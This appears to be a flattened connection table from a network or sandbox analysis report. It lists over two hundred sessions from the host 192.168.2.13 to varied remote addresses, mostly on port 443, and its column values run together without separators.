                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19221192.168.2.1358872170.107.167.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19222192.168.2.133776820.98.134.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19223192.168.2.1360834105.218.143.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19224192.168.2.1353584166.175.98.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19225192.168.2.1358584122.80.224.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19226192.168.2.1350044222.138.163.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19227192.168.2.1334668123.166.4.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19228192.168.2.1350590159.171.248.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19229192.168.2.133284871.131.67.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19230192.168.2.1345182168.162.206.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19231192.168.2.1357518172.80.15.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19232192.168.2.1334620102.77.229.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19233192.168.2.1335278190.135.148.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19234192.168.2.1339024154.159.54.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19235192.168.2.135199274.115.37.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19236192.168.2.134105095.192.13.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19237192.168.2.1350682189.245.186.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19238192.168.2.133369292.232.174.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19239192.168.2.1343884166.124.90.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19240192.168.2.1337880114.28.150.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19241192.168.2.135439639.55.24.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19242192.168.2.134916291.119.161.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19243192.168.2.134849034.102.173.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19244192.168.2.135904258.117.182.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19245192.168.2.133443843.48.248.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19246192.168.2.134755027.112.40.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19247192.168.2.1347146125.166.168.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19248192.168.2.1343506219.76.231.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19249192.168.2.1342840128.173.0.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19250192.168.2.1352918123.232.154.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19251192.168.2.133981675.35.131.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19252192.168.2.135386632.1.29.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19253192.168.2.1356126121.198.66.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19254192.168.2.13464649.131.73.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19255192.168.2.1350882206.141.191.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19256192.168.2.133395646.240.89.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19257192.168.2.135067457.18.9.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19258192.168.2.1347220220.114.204.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19259192.168.2.1345928120.185.255.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19260192.168.2.13397362.228.163.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19261192.168.2.1354480209.79.141.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19262192.168.2.133480436.92.234.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19263192.168.2.135855634.165.1.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19264192.168.2.1343052140.174.184.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19265192.168.2.1346122133.117.36.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19266192.168.2.134257294.143.236.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19267192.168.2.1347542128.249.239.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19268192.168.2.134158613.196.247.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19269192.168.2.1340658146.40.25.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19270192.168.2.135444434.92.229.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19271192.168.2.1350438133.231.81.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19272192.168.2.1346438174.231.71.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19273192.168.2.134935049.168.225.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19274192.168.2.1348478135.63.41.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19275192.168.2.135149467.200.182.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19276192.168.2.1353026102.117.61.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19277192.168.2.1360580187.243.103.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19278192.168.2.135657696.103.68.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19279192.168.2.1353018110.138.245.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19280192.168.2.1346824182.207.23.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19281192.168.2.1360034133.29.162.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19282192.168.2.1358844130.199.87.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19283192.168.2.1345162194.110.61.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19284192.168.2.1340074208.22.199.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19285192.168.2.133458091.251.161.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19286192.168.2.1353686212.65.127.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19287192.168.2.135130412.87.247.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19288192.168.2.133869239.215.225.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19289192.168.2.133488094.35.99.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19290192.168.2.1336688124.87.82.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19291192.168.2.133804236.222.134.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19292192.168.2.1350048121.62.108.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19293192.168.2.1354752148.198.65.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19294192.168.2.1347096171.10.224.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19295192.168.2.1356928177.243.59.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19296192.168.2.134272671.168.163.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19297192.168.2.1341790209.196.165.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19298192.168.2.133660470.39.61.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19299192.168.2.1352064110.191.33.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19300192.168.2.1342950181.178.69.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19301192.168.2.1359322142.84.6.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19302192.168.2.1338884118.79.110.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19303192.168.2.134126661.109.70.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19304192.168.2.1351814191.160.161.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19305192.168.2.133424632.125.236.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19306192.168.2.134616096.127.2.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19307192.168.2.1348472116.221.125.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19308192.168.2.134614657.153.249.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19309192.168.2.1333544104.251.234.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19310192.168.2.1348006147.83.72.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19311192.168.2.1345770165.3.112.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19312192.168.2.13355529.25.80.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19313192.168.2.1352324119.155.40.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19314192.168.2.135648042.184.43.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19315192.168.2.1338708166.139.104.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19316192.168.2.13543369.113.85.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19317192.168.2.135063232.57.154.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19318192.168.2.1337772110.199.156.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19319192.168.2.1358688117.58.111.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19320192.168.2.135598051.183.56.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19321192.168.2.135608074.103.63.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19322192.168.2.1341766102.149.62.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19323192.168.2.135923214.67.167.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19324192.168.2.133991485.174.66.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19325192.168.2.135300245.131.2.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19326192.168.2.1353350149.24.53.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19327192.168.2.1360644181.191.46.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19328192.168.2.1336366143.102.34.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19329192.168.2.134808852.26.70.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19330192.168.2.1340586213.215.50.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19331192.168.2.1344936157.45.60.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19332192.168.2.135210227.170.200.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19333192.168.2.1354108192.194.102.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19334192.168.2.1337054207.155.246.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19335192.168.2.1356888178.160.5.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19336192.168.2.1350154119.153.6.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19337192.168.2.1336124171.11.133.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19338192.168.2.1354554173.17.87.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19339192.168.2.1349906143.76.203.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19340192.168.2.134627874.51.219.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19341192.168.2.134918672.23.14.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19342192.168.2.133946234.128.49.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19343192.168.2.1348852150.68.98.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19344192.168.2.1337600135.54.92.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19345192.168.2.1333026196.145.247.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19346192.168.2.1344626139.112.212.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19347192.168.2.1360188195.26.18.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19348192.168.2.134276477.195.49.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19349192.168.2.1340372209.183.94.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19350192.168.2.134041431.90.4.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19351192.168.2.134283696.169.222.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19352192.168.2.1346270183.106.228.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19353192.168.2.1352216132.55.160.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19354192.168.2.135831443.255.155.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19355192.168.2.133745658.196.175.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19356192.168.2.1338314143.13.105.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19357192.168.2.133323035.222.184.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19358192.168.2.1357306119.251.81.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19359192.168.2.134108438.59.194.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19360192.168.2.135501888.17.208.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19361192.168.2.134463095.188.48.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19362192.168.2.1340710221.104.132.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19363192.168.2.135146870.230.30.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19364192.168.2.1333556221.218.115.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19365192.168.2.1353832146.148.16.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19366192.168.2.134520485.211.123.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19367192.168.2.1349576218.96.1.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19368192.168.2.1346380175.69.75.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19369192.168.2.1340848118.227.217.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19370192.168.2.133773679.9.4.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19371192.168.2.135453012.155.171.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19372192.168.2.1354240132.168.133.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19373192.168.2.1350420184.109.93.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19374192.168.2.1349974113.3.251.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19375192.168.2.1350162222.236.191.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19376192.168.2.133658484.47.104.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19377192.168.2.134283859.177.137.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19378192.168.2.133409250.153.165.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19379192.168.2.1341968109.185.124.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19380192.168.2.133340476.238.31.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19381192.168.2.135811082.165.130.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19382192.168.2.1356998124.44.155.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19383192.168.2.1346110150.233.237.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19384192.168.2.1347918181.141.116.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19385192.168.2.1352532150.129.19.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19386192.168.2.133473689.244.172.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19387192.168.2.1353122129.137.228.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19388192.168.2.1350794173.188.132.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19389192.168.2.1342626104.250.35.1158080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19390192.168.2.1343012103.141.38.528080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19391192.168.2.1342864198.41.207.2188080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19392192.168.2.1358386197.91.142.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19393192.168.2.1349118138.17.123.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19394192.168.2.13422682.77.213.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19395192.168.2.135906277.212.60.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19396192.168.2.1356182156.136.244.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19397192.168.2.135727251.152.148.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19398192.168.2.135836639.141.23.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19399192.168.2.1357906107.228.215.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19400192.168.2.134151076.118.215.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19401192.168.2.1354252209.166.91.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19402192.168.2.1354062152.172.168.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19403192.168.2.133390237.94.108.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19404192.168.2.134468283.127.16.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19405192.168.2.1354928206.77.67.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19406192.168.2.135853850.13.72.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19407192.168.2.1348480189.187.222.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19408192.168.2.134142292.131.228.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19409192.168.2.1344898134.18.191.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19410192.168.2.135593219.110.133.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19411192.168.2.1341934174.109.97.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19412192.168.2.1341782197.237.115.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19413192.168.2.135682634.201.89.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19414192.168.2.134916067.173.162.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19415192.168.2.135069457.84.105.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19416192.168.2.136027669.153.214.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19417192.168.2.1339724142.119.232.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19418192.168.2.13384108.75.4.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19419192.168.2.1342198103.123.38.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19420192.168.2.1338858196.203.27.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19421192.168.2.1342816133.244.69.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19422192.168.2.134934690.70.197.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19423192.168.2.1343052164.117.255.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19424192.168.2.1347562222.90.43.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19425192.168.2.135122080.43.16.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19426192.168.2.1336992123.20.1.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19427192.168.2.133929879.188.92.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19428192.168.2.13434805.158.71.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19429192.168.2.135499446.73.128.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19430192.168.2.134003085.235.250.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19431192.168.2.1351686108.126.205.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19432192.168.2.1344462146.109.218.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19433192.168.2.1344102138.212.137.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19434192.168.2.135875638.223.163.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19435192.168.2.1344884209.196.244.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19436192.168.2.1353776101.165.213.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19437192.168.2.133883845.234.64.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19438192.168.2.135924093.140.191.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19439192.168.2.133907290.121.18.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19440192.168.2.135712253.151.180.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19441192.168.2.135190879.101.250.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
